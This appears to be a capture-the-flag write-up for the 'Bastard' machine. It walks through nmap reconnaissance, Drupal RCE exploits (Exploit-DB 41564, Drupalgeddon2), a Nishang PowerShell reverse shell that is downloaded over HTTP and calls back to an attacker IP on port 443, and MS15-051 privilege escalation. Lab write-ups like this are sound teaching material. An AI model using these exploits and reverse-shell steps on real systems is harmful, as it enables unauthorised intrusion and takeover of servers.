Bastard
Reconnaissance:
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.9
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to Bastard | Bastard
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.9
All 1000 scanned ports on 10.10.10.9 are in ignored states.

We have three open TCP ports; the UDP scan turned up nothing.
Port 80: running Drupal 7
Port 135 & 49154: running Microsoft Windows RPC
The server header shows IIS 7.5, which is the version that ships with Windows 7 / Server 2008 R2, and the http-generator header confirms the site is running Drupal 7.
Enumeration: Drupal TCP 80
Visit the web application in the browser.
It’s running Drupal, a free and open-source content management framework. Let’s look at the CHANGELOG to find the exact version (robots.txt lists /CHANGELOG.txt as disallowed, but that only keeps crawlers away; the file is still readable).
Let’s try and find credentials to this application. I googled “default credentials drupal”, but I didn’t find anything useful. Next, I tried common credentials admin/admin, admin/password, etc. but was not able to log in.
When the target is off-the-shelf software, I usually don’t brute-force the login, because it probably has a lockout policy in place.
Searchsploit:
Next, run searchsploit.
Let’s look at Exploit-DB entry 41564.
It links to a writeup of the vulnerability: a deserialization bug in the Drupal 7 Services module that leads to Remote Code Execution (RCE). Looking at the code, we see that it sends its requests to the path /rest_endpoint.
That path is not found on the box, but if we simply change it to /rest it works! So the Services module is installed with a REST endpoint named rest (the endpoint name is whatever the administrator configured, so it has to be guessed). We’ll use this exploit to gain an initial foothold on the box.
Foothold:
Make the following changes to the exploit code: point the target URL at the box and change the endpoint from rest_endpoint to rest.
Run the exploit.
Perfect! It created two files: session.json and user.json. View the content of user.json.
It gives us the admin user’s record, including the password hash. The $S$ prefix identifies it as a Drupal 7 hash, so I tried to crack it:
However, that was going to take about three days on my system, and I don’t really need the password at this point: session.json already gives us a valid session cookie for the admin user.
Exploit: Ruby Script
On reading about Drupalgeddon2, it seems the first PoC tests the vulnerability on a Drupal 8-specific path.
I’ll try the Ruby script instead: searchsploit -m exploits/php/webapps/44449.rb. Running it returns the help text and a warning:
I’ll fix the warning about \r (CRLF line endings) with dos2unix:
Shell: Nishang
I can upgrade this to a Nishang shell by grabbing a copy of Invoke-PowerShellTcp.ps1, appending a call to the function at the end of the file, Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.14 -Port 443, and serving that directory with python3 -m http.server 80. I also open a nc listener on port 443.
Then I give this command to the Drupalgeddon2 shell:
My Python web server gets the request for shell.ps1 and sends it. When shell.ps1 runs, it loads the functions and then invokes the reverse shell back to me on port 443, which I catch in nc:
Privesc : MS15-051
We use “whoami /priv” to check our user’s privileges and see that we hold “SeImpersonatePrivilege“. We already know this one from other machines: it lets us impersonate any token we can get hold of, in practice that of “nt authority\system“.
We are also on Windows Server 2008 R2, for which several kernel-level exploits exist that we could use instead; MS15-051 (a win32k.sys privilege escalation) is one of them.
I’ll grab it from here: